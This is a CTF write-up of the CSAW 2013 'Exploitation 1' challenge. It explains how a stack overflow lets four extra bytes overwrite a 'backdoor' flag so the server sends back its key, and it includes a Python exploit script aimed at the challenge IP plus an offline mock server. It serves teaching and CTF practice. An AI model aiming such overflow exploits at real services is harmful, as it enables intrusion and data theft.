Monday, September 23, 2013

CSAW CTF 2013 :: Exploitation 1 - 100 points

For this challenge, the following code snippet was given in a file, exploit1.c

[snip]
/* fd is a FILE * declared in the part of exploit1.c that was snipped. */
void handle(int newsock) {
    int backdoor = 0;               /* the overflow target: never set legitimately */
    char buffer[1016];
    memset(buffer, 0, 1016);

    send(newsock, "Welcome to CSAW CTF.", 21, 0);
    recv(newsock, buffer, 1020, 0); /* accepts up to 1020 bytes into a 1016-byte buffer */
    buffer[1015] = 0;               /* terminates the string, but bytes 1016..1019 already spilled past it */

    if ( backdoor ) {
        fd = fopen("./key", "r");
        fscanf(fd, "%s\n", buffer); /* key + NUL overwrite the start of buffer */
        send(newsock, buffer, 512, 0);
    }
    close(newsock);
}
[snip]


A netcat connection command was also provided: "nc 128.238.66.212 31337".

Based on the netcat command and the code snippet, we were supposed to open a connection to the IP and port provided; the snippet is the server side of that connection.

Taking a closer look at the code snippet, the program reads the file ./key and sends its contents back only when backdoor is nonzero. backdoor is initialised to 0 and nothing in the function sets it, so it has to be changed some other way. buffer is 1016 bytes, but recv() is allowed to write up to 1020 bytes into it, so a message longer than 1016 bytes overflows the buffer by up to four bytes. Because of how the local variables are laid out in the function's stack frame (backdoor sits immediately after buffer), those four extra bytes land on backdoor. The buffer[1015] = 0 line only terminates the string; it does not undo the overwrite. Note that if ( backdoor ) passes for any nonzero value, so the four bytes do not need to be anything in particular.

Therefore, to solve this challenge, all we needed to do was send 1016 bytes of filler followed by four "1" characters (backdoor becomes 0x31313131; any nonzero value works) to the server. The server then replies with 512 bytes of its buffer: the contents of ./key, a NUL terminator, and whatever of our filler was left after it.
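The exchange described above as a Python script. This is an added example, not the script used in the original writeup: build_payload(), recv_exact() and exploit() are names chosen here, and the "mock server" at the bottom is a constructed stand-in that models the vulnerable handle() (one recv() of up to 1020 bytes into a 1016-byte buffer, the four spilled bytes acting as backdoor) so the script can be run offline with a made-up key. Pointing exploit() at the real host and port from the challenge is the same call.

```python
import socket
import threading

# Challenge endpoint quoted in the writeup.
HOST = "128.238.66.212"
PORT = 31337

BUFFER_SIZE = 1016   # char buffer[1016]
RECV_SIZE = 1020     # recv(newsock, buffer, 1020, 0)
REPLY_SIZE = 512     # send(newsock, buffer, 512, 0)


def build_payload(filler=b"A", overwrite=b"1111"):
    """1016 filler bytes fill `buffer`; the next 4 bytes land on `backdoor`.

    "1111" makes backdoor 0x31313131; `if (backdoor)` only needs it nonzero.
    """
    if len(overwrite) != 4 or not any(overwrite):
        raise ValueError("overwrite must be 4 bytes and not all zero")
    return filler * BUFFER_SIZE + overwrite


def recv_exact(sock, n):
    """Read n bytes, or until the peer closes; a single recv() may return fewer."""
    chunks, got = [], 0
    while got < n:
        chunk = sock.recv(n - got)
        if not chunk:
            break
        chunks.append(chunk)
        got += len(chunk)
    return b"".join(chunks)


def exploit(host=HOST, port=PORT, payload=None, timeout=5.0):
    """Read the banner, send the overflow, return (banner, key)."""
    payload = build_payload() if payload is None else payload
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = recv_exact(s, 21)           # "Welcome to CSAW CTF." plus its NUL
        s.sendall(payload)
        reply = recv_exact(s, REPLY_SIZE)    # 512 bytes of the server's buffer, if any
    # fscanf wrote key + NUL at the start of buffer; everything after is our filler.
    key = reply.split(b"\x00", 1)[0]
    return banner.rstrip(b"\x00"), key


# ---- Constructed stand-in for the server so the script runs offline (not the real key) ----
FAKE_KEY = b"flag{constructed_example_key}"


def _mock_handle(conn):
    """Models handle(): one recv() of up to 1020 bytes into a 1016-byte buffer."""
    conn.sendall(b"Welcome to CSAW CTF.\x00")
    data = conn.recv(RECV_SIZE)             # loopback delivers our 1020 bytes at once
    buffer = bytearray(BUFFER_SIZE)
    head = data[:BUFFER_SIZE]
    buffer[:len(head)] = head
    buffer[BUFFER_SIZE - 1] = 0             # buffer[1015] = 0
    backdoor = data[BUFFER_SIZE:RECV_SIZE]  # the bytes that spilled past buffer
    if any(backdoor):                       # if ( backdoor )
        buffer[:len(FAKE_KEY) + 1] = FAKE_KEY + b"\x00"   # fscanf("%s") into buffer
        conn.sendall(bytes(buffer[:REPLY_SIZE]))
    conn.close()


def start_mock_server():
    """Listen on an ephemeral loopback port, serve one connection, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve_one():
        conn, _ = srv.accept()
        try:
            _mock_handle(conn)
        finally:
            srv.close()

    threading.Thread(target=serve_one, daemon=True).start()
    return port


if __name__ == "__main__":
    mock_port = start_mock_server()
    print(exploit("127.0.0.1", mock_port))
```

Running the file as-is talks to the mock server; exploit(HOST, PORT) would run the same exchange against the challenge box. Sending exactly 1016 bytes through the same code path shows the other side of the boundary: nothing spills onto backdoor and the server closes the connection without a key.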

As shown, we successfully obtained the key for this challenge!

